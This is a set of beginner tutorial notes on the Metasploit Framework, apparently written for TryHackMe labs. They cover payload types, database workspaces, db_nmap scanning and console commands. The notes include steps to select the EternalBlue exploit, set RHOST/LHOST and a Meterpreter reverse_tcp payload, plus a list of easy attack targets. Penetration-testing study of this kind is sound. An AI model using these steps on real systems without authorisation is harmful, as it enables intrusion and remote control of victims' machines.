01. Metasploit The Basics Modules, Exploits & Payloads

The Metasploit Framework is a widely used tool for penetration testing, security research, and vulnerability assessments. It provides a comprehensive environment for exploiting vulnerabilities in systems and includes tools for reconnaissance, payload generation, and post-exploitation.

Key Features of Metasploit¶

Modular Design:
- Modules for exploits, payloads, auxiliary functions, and post-exploitation.
Exploitation:
- Automates the process of exploiting known vulnerabilities in systems or applications.
Payloads:
- Delivers code or commands to the target system after a successful exploit.
Post-Exploitation:
- Tools for maintaining access, privilege escalation, and data collection.
Auxiliary Tools:
- Includes scanners, fuzzers, and other utilities for gathering information and testing vulnerabilities.

Common Components in Metasploit¶

Exploits:
- Code designed to take advantage of a vulnerability.
- Example: exploit/windows/smb/ms17_010_eternalblue.
- Payloads:
- Code executed after exploiting a system.
- Types include:
  - Single Payloads: Perform one task (e.g., adding a user).
  - Staged Payloads: Deliver large or complex code in smaller parts.
- Encoders:
- Obfuscate payloads to evade detection by antivirus software.
- Auxiliary Modules:
- Non-exploit functionalities such as scanners and fuzzers.
- Post-Exploitation Modules:
- Tools for privilege escalation, dumping credentials, or gathering additional system information.

Types of Payloads¶

Meterpreter:
- A powerful and extensible post-exploitation tool.
- Features:
  - Command shell interaction.
  - File transfer capabilities.
  - Process management.
  - Network pivoting.
- Reverse Shell:
- Connects back to the attacker’s machine to provide shell access.
- Bind Shell:
- Opens a listening port on the victim's system that the attacker can connect to.
- Staged Payloads:
- Breaks the payload into smaller parts to bypass network restrictions.
- Inline Payloads:
- A single, self-contained payload.

Metasploit Setup¶

1. Purpose¶

In real penetration testing, multiple targets are common.
Metasploit’s database feature helps:
- Store and organize hosts, services, vulnerabilities.
- Avoid confusion with multiple targets.
- Reuse scan results in modules without manually retyping IPs.

2. Database Setup (Kali / Non-AttackBox Systems)¶

If you’re on TryHackMe AttackBox → already done.
If on Kali or local setup:

systemctl start postgresql
sudo -u postgres msfdb init

Note: Running msfdb init as root will cause:
Please run msfdb as a non-root user.
Solution → use the postgres account as above.

If you want to re-init:

sudo -u postgres msfdb delete
sudo -u postgres msfdb init

3. Checking Database Status¶

In msfconsole:

db_status

Example:

[*] Connected to msf. Connection type: postgresql.

4. Workspaces¶

Workspaces keep projects separate.

List:
```
workspace
```
Add:
```
workspace -a tryhackme
```
Switch:
```
workspace tryhackme
```
Delete:
```
workspace -d tryhackme
```

Example:

default
* tryhackme

(* marks the current workspace)

5. Database Backend Commands¶

Once DB is active, extra commands are available:

db_nmap – Run Nmap & save results
hosts – List stored hosts
services – List services on stored hosts
vulns – List found vulnerabilities
loot – Show collected loot (files/data)
notes – Show analyst notes
workspace – Switch projects

6. Example Workflow¶

Step 1 – Run Nmap and store results¶

db_nmap -sV -p- 10.10.12.229

-sV → Service version detection
-p- → Scan all ports
Results are automatically saved in DB.

Step 2 – View Hosts¶

hosts

Example output:

address       mac                name             os_name
10.10.12.229  02:ce:59:27:c8:e3  ip-10-10-12-229  Unknown

Step 3 – View Services¶

services

Example:

host          port  proto  name         state  info
10.10.12.229  445   tcp    microsoft-ds open   Microsoft Windows

Step 4 – Use Hosts in Modules¶

If you found a host with SMB:

use auxiliary/scanner/smb/smb_ms17_010
hosts -R     # Loads DB hosts into RHOSTS
show options
run

Step 5 – Search Specific Services¶

Example: Find netbios services

services -S netbios

Output:

host          port  proto  name         state  info
10.10.12.229  139   tcp    netbios-ssn  open   Microsoft Windows netbios-ssn

7. Common “Low Hanging Fruits”¶

HTTP → Check for SQLi, RCE, file uploads.
FTP → Try anonymous login.
SMB → Look for MS17-010 (EternalBlue).
SSH → Test for weak/default passwords.
RDP → BlueKeep or weak credentials.

Example Mini Scenario¶

Create workspace:
```
workspace -a project1
```
Scan entire subnet:
```
db_nmap -sV 10.10.12.0/24
```
Find SMB servers:
```
services -S microsoft-ds
```

Test for MS17-010:

use auxiliary/scanner/smb/smb_ms17_010
hosts -R
run

Metasploit Commands¶

1. help¶

help

Displays a list of all available commands in Metasploit.
Useful for beginners to understand the available functionalities.

2. search¶

search type:exploit platform:windows <name>

Searches for modules matching the criteria.
- type:exploit specifies the type of module (e.g., exploit, auxiliary, payload).
- platform:windows filters results for the Windows platform.
- <name> can be a specific keyword related to the target or exploit (e.g., "smb").

3. use¶

use module /path

Selects a specific module for use.

Example:

use exploit/windows/smb/ms17_010_eternalblue

4. show¶

General Command
```
show
```
- Lists all available modules or options, depending on the current context.
- Show Options
```
show options
```
- Displays configurable options for the selected module, such as RHOST (remote host) or LHOST (local host).
- Show Targets
```
show targets
```
- Lists all the operating systems or environments the exploit is compatible with.
- Show Info
```
show info
```
- Provides detailed information about the selected module, including its purpose and requirements.

5. set¶

set OPTION VALUE

Configures an option for the selected module.

Example:

set RHOST 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/meterpreter/reverse_tcp

6. back¶

back

Exits the current module and returns to the main console.

7. exit¶

exit

Quits the Metasploit console.